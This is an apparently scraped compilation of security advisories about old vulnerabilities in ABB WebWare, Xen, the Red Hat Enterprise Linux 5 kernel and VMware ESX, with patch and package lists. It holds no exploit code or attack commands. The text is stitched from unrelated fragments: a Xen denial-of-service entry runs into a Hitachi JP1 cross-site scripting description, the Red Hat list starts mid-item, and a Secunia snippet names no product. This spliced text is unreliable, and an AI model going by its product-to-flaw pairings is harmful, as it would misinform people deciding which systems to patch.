https://ca.secunia.com/?page=viewadvisory&vuln_id=48090
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
A vulnerability has been reported in multiple ABB products, which can
be exploited by malicious people to compromise a vulnerable system.
The vulnerability is reported in the following versions:
* RobotStudio, Robot Communications Runtime, PC SDK, and IRC5 OPC
Server version 5.41.01 and prior.
* PickMaster 3 version 3.3 and prior.
* PickMaster 5 version 5.13 and prior.
* WebWare SDK and ABB Interlink Module versions 4.6 through 4.9.
* WebWare Server versions 4.6 through 4.91.
SOLUTION:
Update to a fixed version or apply patch (please see the vendor's
advisory for details).
PROVIDED AND/OR DISCOVERED BY:
Luigi Auriemma via ZDI.
ORIGINAL ADVISORY:
ABB:
http://www05.abb.com/global/scot/scot348.nsf/veritydisplay/f261be074480dc24c12579a00049ecd5/$file/si10227a1%20vulnerability%20security%20advisory.pdf
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-12-033/
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/vulnerability_intelligence/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
ZDI-12-033 : ABB WebWare RobNetScanHost.exe Remote Code Execution
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-12-033
February 22, 2012
- -- CVE ID:
- -- CVSS:
10, AV:N/AC:L/Au:N/C:C/I:C/A:C
- -- Affected Vendors:
ABB
- -- Affected Products:
ABB WebWare
- -- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11594.
- -- Vendor Response:
ABB has issued an update to correct this vulnerability. More details can
be found at:
http://www05.abb.com/global/scot/scot348.nsf/veritydisplay/f261be074480dc24c12579a00049ecd5/$file/si10227a1%20vulnerability%20security%20advisory.pdf
- -- Disclosure Timeline:
2011-10-10 - Vulnerability reported to vendor
2012-02-22 - Coordinated public release of advisory
- -- Credit:
This vulnerability was discovered by:
* Luigi Auriemma
- -- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.17 (MingW32)
iQEcBAEBAgAGBQJPRUiZAAoJEFVtgMGTo1sc9REIAKdxGGjQNRsQBQh7OZ3Bbfz2
vbul36hrqRdCxEmV++F5LcoFSpXmRx7Wjc6FHcUKkGGbRQ7+I9zjAi4CzwubSjCY
zk+G0v324lSwQ7be6bxp5kGl5UTjVDczlfyjG2K2QSPBitz/RpkhpaTDXJcBALLR
lx8KOxgAT9TGEodE5pjG2R2eCeDgrV34q5+xu3hdMQYWgvdYqoL39OHw/7QMjIOT
NO1hYzGpadTcRuXwDzkpsJi+Gx03DinnlJ1VjUaXPfdbnN7IpGoON7yaYkjXDBVf
NHA2pvKBl0mRjevIy/uQqJpsG8KC4eR5pHdl/lTKV61vb45zAyewDo5EM9xl6J0=
=DeOF
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
VAR-201401-0010 | CVE-2011-1763 | Xen of get_free_port Service disruption in functions (DoS) Vulnerabilities |
CVSS V2: 7.7 CVSS V3: - Severity: HIGH |
The get_free_port function in Xen allows local authenticated DomU users to cause a denial of service or possibly gain privileges via unspecified vectors involving a new event channel port. Xen is prone to a denial-of-service vulnerability.
Attackers with DomU user privileges can exploit this issue to cause the application to crash, denying service to legitimate users. Privilege escalation may also be possible; however, this has not been confirmed. Hitachi JP1 products are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The following products are affected:
JP1/IT Resource Management - Manager
JP1/IT Service Level Management - Manager.
The Red Hat Security Response Team has rated this update as having
important security impact. Common Vulnerability Scoring System (CVSS) base
scores, which give detailed severity ratings, are available for each
vulnerability from the CVE links in the References section. Relevant releases/architectures:
Red Hat Enterprise Linux (v. 5 server) - i386, ia64, noarch, ppc, s390x, x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, noarch, x86_64
3. Description:
The kernel packages contain the Linux kernel, the core of any Linux
operating system. (CVE-2011-1093, Important)
* Multiple buffer overflow flaws were found in the Linux kernel's
Management Module Support for Message Passing Technology (MPT) based
controllers.
(CVE-2011-1494, CVE-2011-1495, Important)
* A missing validation of a null-terminated string data structure element
in the bnep_sock_ioctl() function could allow a local user to cause an
information leak or a denial of service. (CVE-2011-1079, Moderate)
* Missing error checking in the way page tables were handled in the Xen
hypervisor implementation could allow a privileged guest user to cause the
host, and the guests, to lock up. (CVE-2011-1166, Moderate)
* A flaw was found in the way the Xen hypervisor implementation checked for
the upper boundary when getting a new event channel port. (CVE-2011-1763, Moderate)
* The start_code and end_code values in "/proc/[pid]/stat" were not
protected. In certain scenarios, this flaw could be used to defeat Address
Space Layout Randomization (ASLR). (CVE-2011-0726, Low)
* A missing initialization flaw in the sco_sock_getsockopt() function could
allow a local, unprivileged user to cause an information leak.
(CVE-2011-1078, Low)
* A missing validation of a null-terminated string data structure element
in the do_replace() function could allow a local user who has the
CAP_NET_ADMIN capability to cause an information leak. (CVE-2011-1080, Low)
* A buffer overflow flaw in the DEC Alpha OSF partition implementation in
the Linux kernel could allow a local attacker to cause an information leak
by mounting a disk that contains specially-crafted partition tables.
(CVE-2011-1163, Low)
* Missing validations of null-terminated string data structure elements in
the do_replace(), compat_do_replace(), do_ipt_get_ctl(), do_ip6t_get_ctl(),
and do_arpt_get_ctl() functions could allow a local user who has the
CAP_NET_ADMIN capability to cause an information leak. (CVE-2011-1170,
CVE-2011-1171, CVE-2011-1172, Low)
* A heap overflow flaw in the Linux kernel's EFI GUID Partition Table (GPT)
implementation could allow a local attacker to cause a denial of service
by mounting a disk that contains specially-crafted partition tables.
(CVE-2011-1577, Low)
Red Hat would like to thank Dan Rosenberg for reporting CVE-2011-1494 and
CVE-2011-1495; Vasiliy Kulikov for reporting CVE-2011-1079, CVE-2011-1078,
CVE-2011-1080, CVE-2011-1170, CVE-2011-1171, and CVE-2011-1172; Kees Cook
for reporting CVE-2011-0726; and Timo Warns for reporting CVE-2011-1163
and CVE-2011-1577.
This update also fixes several bugs. Documentation for these bug fixes will
be available shortly from the Technical Notes document linked to in the
References section.
Users should upgrade to these updated packages, which contain backported
patches to correct these issues, and fix the bugs noted in the Technical
Notes. The system must be rebooted for this update to take effect. Solution:
Before applying this update, make sure all previously-released errata
relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to
use the Red Hat Network to apply this update are available at
https://access.redhat.com/kb/docs/DOC-11259
To install kernel packages manually, use "rpm -ivh [package]". Do not
use "rpm -Uvh" as that will remove the running kernel binaries from
your system. You may use "rpm -e" to remove old kernels after
determining that the new kernel functions properly on your system. Bugs fixed (http://bugzilla.redhat.com/):
681259 - CVE-2011-1078 kernel: bt sco_conninfo infoleak
681260 - CVE-2011-1079 kernel: bnep device field missing NULL terminator
681262 - CVE-2011-1080 kernel: ebtables stack infoleak
682954 - CVE-2011-1093 kernel: dccp: fix oops on Reset after close
684569 - CVE-2011-0726 kernel: proc: protect mm start_code/end_code in /proc/pid/stat
688021 - CVE-2011-1163 kernel: fs/partitions: Corrupted OSF partition table infoleak
688156 - [5.6][REG]for some uses of 'nfsservctl' system call, the kernel crashes. [rhel-5.6.z]
688579 - CVE-2011-1166 kernel: xen: x86_64: fix error checking in arch_set_info_guest()
689321 - CVE-2011-1170 ipv4: netfilter: arp_tables: fix infoleak to userspace
689327 - CVE-2011-1171 ipv4: netfilter: ip_tables: fix infoleak to userspace
689345 - CVE-2011-1172 ipv6: netfilter: ip6_tables: fix infoleak to userspace
689699 - Deadlock between device driver attachment and device removal with a USB device [rhel-5.6.z]
689700 - [NetApp 5.6 Bug] QLogic 8G FC firmware dumps seen during IO [rhel-5.6.z]
690134 - Time runs too fast in a VM on processors with > 4GHZ freq [rhel-5.6.z]
690239 - gfs2: creating large files suddenly slow to a crawl [rhel-5.6.z]
694021 - CVE-2011-1494 CVE-2011-1495 kernel: drivers/scsi/mpt2sas: prevent heap overflows
695976 - CVE-2011-1577 kernel: corrupted GUID partition tables can cause kernel oops
696136 - RHEL 5.6 (kernel -238) causes audio issues [rhel-5.6.z]
697448 - slab corruption after seeing some nfs-related BUG: warning [rhel-5.6.z]
699808 - dasd: fix race between open and offline [rhel-5.6.z]
701240 - CVE-2011-1763 kernel: xen: improper upper boundary check in get_free_port() function
6. Package List:
Red Hat Enterprise Linux Desktop (v. 5 client):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/kernel-2.6.18-238.12.1.el5.src.rpm
i386:
kernel-2.6.18-238.12.1.el5.i686.rpm
kernel-PAE-2.6.18-238.12.1.el5.i686.rpm
kernel-PAE-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-PAE-devel-2.6.18-238.12.1.el5.i686.rpm
kernel-debug-2.6.18-238.12.1.el5.i686.rpm
kernel-debug-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-debug-devel-2.6.18-238.12.1.el5.i686.rpm
kernel-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-debuginfo-common-2.6.18-238.12.1.el5.i686.rpm
kernel-devel-2.6.18-238.12.1.el5.i686.rpm
kernel-headers-2.6.18-238.12.1.el5.i386.rpm
kernel-xen-2.6.18-238.12.1.el5.i686.rpm
kernel-xen-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-xen-devel-2.6.18-238.12.1.el5.i686.rpm
noarch:
kernel-doc-2.6.18-238.12.1.el5.noarch.rpm
x86_64:
kernel-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debug-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debug-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debug-devel-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debuginfo-common-2.6.18-238.12.1.el5.x86_64.rpm
kernel-devel-2.6.18-238.12.1.el5.x86_64.rpm
kernel-headers-2.6.18-238.12.1.el5.x86_64.rpm
kernel-xen-2.6.18-238.12.1.el5.x86_64.rpm
kernel-xen-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm
kernel-xen-devel-2.6.18-238.12.1.el5.x86_64.rpm
Red Hat Enterprise Linux (v. 5 server):
Source:
ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Server/en/os/SRPMS/kernel-2.6.18-238.12.1.el5.src.rpm
i386:
kernel-2.6.18-238.12.1.el5.i686.rpm
kernel-PAE-2.6.18-238.12.1.el5.i686.rpm
kernel-PAE-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-PAE-devel-2.6.18-238.12.1.el5.i686.rpm
kernel-debug-2.6.18-238.12.1.el5.i686.rpm
kernel-debug-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-debug-devel-2.6.18-238.12.1.el5.i686.rpm
kernel-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-debuginfo-common-2.6.18-238.12.1.el5.i686.rpm
kernel-devel-2.6.18-238.12.1.el5.i686.rpm
kernel-headers-2.6.18-238.12.1.el5.i386.rpm
kernel-xen-2.6.18-238.12.1.el5.i686.rpm
kernel-xen-debuginfo-2.6.18-238.12.1.el5.i686.rpm
kernel-xen-devel-2.6.18-238.12.1.el5.i686.rpm
ia64:
kernel-2.6.18-238.12.1.el5.ia64.rpm
kernel-debug-2.6.18-238.12.1.el5.ia64.rpm
kernel-debug-debuginfo-2.6.18-238.12.1.el5.ia64.rpm
kernel-debug-devel-2.6.18-238.12.1.el5.ia64.rpm
kernel-debuginfo-2.6.18-238.12.1.el5.ia64.rpm
kernel-debuginfo-common-2.6.18-238.12.1.el5.ia64.rpm
kernel-devel-2.6.18-238.12.1.el5.ia64.rpm
kernel-headers-2.6.18-238.12.1.el5.ia64.rpm
kernel-xen-2.6.18-238.12.1.el5.ia64.rpm
kernel-xen-debuginfo-2.6.18-238.12.1.el5.ia64.rpm
kernel-xen-devel-2.6.18-238.12.1.el5.ia64.rpm
noarch:
kernel-doc-2.6.18-238.12.1.el5.noarch.rpm
ppc:
kernel-2.6.18-238.12.1.el5.ppc64.rpm
kernel-debug-2.6.18-238.12.1.el5.ppc64.rpm
kernel-debug-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm
kernel-debug-devel-2.6.18-238.12.1.el5.ppc64.rpm
kernel-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm
kernel-debuginfo-common-2.6.18-238.12.1.el5.ppc64.rpm
kernel-devel-2.6.18-238.12.1.el5.ppc64.rpm
kernel-headers-2.6.18-238.12.1.el5.ppc.rpm
kernel-headers-2.6.18-238.12.1.el5.ppc64.rpm
kernel-kdump-2.6.18-238.12.1.el5.ppc64.rpm
kernel-kdump-debuginfo-2.6.18-238.12.1.el5.ppc64.rpm
kernel-kdump-devel-2.6.18-238.12.1.el5.ppc64.rpm
s390x:
kernel-2.6.18-238.12.1.el5.s390x.rpm
kernel-debug-2.6.18-238.12.1.el5.s390x.rpm
kernel-debug-debuginfo-2.6.18-238.12.1.el5.s390x.rpm
kernel-debug-devel-2.6.18-238.12.1.el5.s390x.rpm
kernel-debuginfo-2.6.18-238.12.1.el5.s390x.rpm
kernel-debuginfo-common-2.6.18-238.12.1.el5.s390x.rpm
kernel-devel-2.6.18-238.12.1.el5.s390x.rpm
kernel-headers-2.6.18-238.12.1.el5.s390x.rpm
kernel-kdump-2.6.18-238.12.1.el5.s390x.rpm
kernel-kdump-debuginfo-2.6.18-238.12.1.el5.s390x.rpm
kernel-kdump-devel-2.6.18-238.12.1.el5.s390x.rpm
x86_64:
kernel-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debug-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debug-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debug-devel-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm
kernel-debuginfo-common-2.6.18-238.12.1.el5.x86_64.rpm
kernel-devel-2.6.18-238.12.1.el5.x86_64.rpm
kernel-headers-2.6.18-238.12.1.el5.x86_64.rpm
kernel-xen-2.6.18-238.12.1.el5.x86_64.rpm
kernel-xen-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm
kernel-xen-devel-2.6.18-238.12.1.el5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2011-0726.html
https://www.redhat.com/security/data/cve/CVE-2011-1078.html
https://www.redhat.com/security/data/cve/CVE-2011-1079.html
https://www.redhat.com/security/data/cve/CVE-2011-1080.html
https://www.redhat.com/security/data/cve/CVE-2011-1093.html
https://www.redhat.com/security/data/cve/CVE-2011-1163.html
https://www.redhat.com/security/data/cve/CVE-2011-1166.html
https://www.redhat.com/security/data/cve/CVE-2011-1170.html
https://www.redhat.com/security/data/cve/CVE-2011-1171.html
https://www.redhat.com/security/data/cve/CVE-2011-1172.html
https://www.redhat.com/security/data/cve/CVE-2011-1494.html
https://www.redhat.com/security/data/cve/CVE-2011-1495.html
https://www.redhat.com/security/data/cve/CVE-2011-1577.html
https://www.redhat.com/security/data/cve/CVE-2011-1763.html
https://access.redhat.com/security/updates/classification/#important
http://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Linux/5/html/5.6_Technical_Notes/kernel.html#RHSA-2011-0833
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2011 Red Hat, Inc. ----------------------------------------------------------------------
Join Secunia @ FIRST Conference, 12-17 June, Hilton Vienna, Austria
See to the presentation "The Dynamics and Threats of End-Point Software Portfolios" by Secunia's Research Analyst Director, Stefan Frei.
Certain unspecified input is not properly sanitised before being
returned to the user.
The vulnerability is reported in version 09-50.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
----------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2012-0001
Synopsis: VMware ESXi and ESX updates to third party library
and ESX Service Console
Issue date: 2012-01-30
Updated on: 2012-01-30 (initial advisory)
CVE numbers: --- COS Kernel ---
CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163,
CVE-2011-1166, CVE-2011-1170, CVE-2011-1171,
CVE-2011-1172, CVE-2011-1494, CVE-2011-1495,
CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044,
CVE-2011-1182, CVE-2011-1573, CVE-2011-1576,
CVE-2011-1593, CVE-2011-1745, CVE-2011-1746,
CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780,
CVE-2011-2525, CVE-2011-2689, CVE-2011-2482,
CVE-2011-2491, CVE-2011-2495, CVE-2011-2517,
CVE-2011-2519, CVE-2011-2901
--- COS cURL ---
CVE-2011-2192
--- COS rpm ---
CVE-2010-2059, CVE-2011-3378
--- COS samba ---
CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522, CVE-2011-2694
--- COS python ---
CVE-2009-3720, CVE-2010-3493, CVE-2011-1015,
CVE-2011-1521
--- python library ---
CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, CVE-2011-1521
----------------------------------------------------------------------
1. Summary
VMware ESXi and ESX updates to third party library and ESX Service
Console address several security issues.
2. Relevant releases
ESXi 4.1 without patch ESXi410-201201401-SG
ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG,
ESX410-201201404-SG, ESX410-201201405-SG,
ESX410-201201406-SG, ESX410-201201407-SG
3. Problem Description
a. ESX third party update for Service Console kernel
The ESX Service Console Operating System (COS) kernel is updated to
kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the
COS kernel.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,
CVE-2011-1080, CVE-2011-1093, CVE-2011-1163, CVE-2011-1166,
CVE-2011-1170, CVE-2011-1171, CVE-2011-1172, CVE-2011-1494,
CVE-2011-1495, CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,
CVE-2011-0695, CVE-2011-0711, CVE-2011-1044, CVE-2011-1182,
CVE-2011-1573, CVE-2011-1576, CVE-2011-1593, CVE-2011-1745,
CVE-2011-1746, CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,
CVE-2011-2213, CVE-2011-2492, CVE-2011-1780, CVE-2011-2525,
CVE-2011-2689, CVE-2011-2482, CVE-2011-2491, CVE-2011-2495,
CVE-2011-2517, CVE-2011-2519, CVE-2011-2901 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201401-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
b. ESX third party update for Service Console cURL RPM
The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9
resolving a security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2011-2192 to this issue.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201402-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
c. ESX third party update for Service Console nspr and nss RPMs
The ESX Service Console (COS) nspr and nss RPMs are updated to
nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving
a security issues.
A Certificate Authority (CA) issued fraudulent SSL certificates and
Netscape Portable Runtime (NSPR) and Network Security Services (NSS)
contain the built-in tokens of this fraudulent Certificate
Authority. This update renders all SSL certificates signed by the
fraudulent CA as untrusted for all uses.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201404-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
d. ESX third party update for Service Console rpm RPMs
The ESX Service Console Operating System (COS) rpm packages are
updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,
rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2
which fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-2059 and CVE-2011-3378 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201406-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
e. ESX third party update for Service Console samba RPMs
The ESX Service Console Operating System (COS) samba packages are
updated to samba-client-3.0.33-3.29.el5_7.4,
samba-common-3.0.33-3.29.el5_7.4 and
libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security
issues in the Samba client.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,
CVE-2011-2522 and CVE-2011-2694 to these issues.
Note that ESX does not include the Samba Web Administration Tool
(SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and
CVE-2011-2694.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201407-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
f. ESX third party update for Service Console python package
The ESX Service Console (COS) python package is updated to
2.4.3-44 which fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3720, CVE-2010-3493, CVE-2011-1015 and
CVE-2011-1521 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.1 ESX ESX410-201201405-SG
ESX 4.0 ESX patch pending
ESX 3.5 ESX not applicable
* hosted products are VMware Workstation, Player, ACE, Fusion.
g. ESXi update to third party component python
The python third party library is updated to python 2.5.6 which
fixes multiple security issues.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,
CVE-2010-2089, and CVE-2011-1521 to these issues.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 5.0 ESXi patch pending
ESXi 4.1 ESXi ESXi410-201201401-SG
ESXi 4.0 ESXi patch pending
ESXi 3.5 ESXi patch pending
ESX 4.1 ESX not affected
ESX 4.0 ESX not affected
ESX 3.5 ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
4. Solution
Please review the patch/release notes for your product and version
and verify the checksum of your downloaded file.
VMware ESXi 4.1
---------------
ESXi410-201201401
http://downloads.vmware.com/go/selfsupport-download
md5sum: BDF86F10A973346E26C9C2CD4C424E88
sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F
http://kb.vmware.com/kb/2009143
ESXi410-201201401 contains ESXi410-201201401-SG
VMware ESX 4.1
--------------
ESX410-201201001
http://downloads.vmware.com/go/selfsupport-download
md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F
sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC
http://kb.vmware.com/kb/2009142
ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG,
ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and
ESX410-201201407-SG
5. References
CVE numbers
--- COS Kernel ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901
--- COS cURL ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192
--- COS rpm ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059
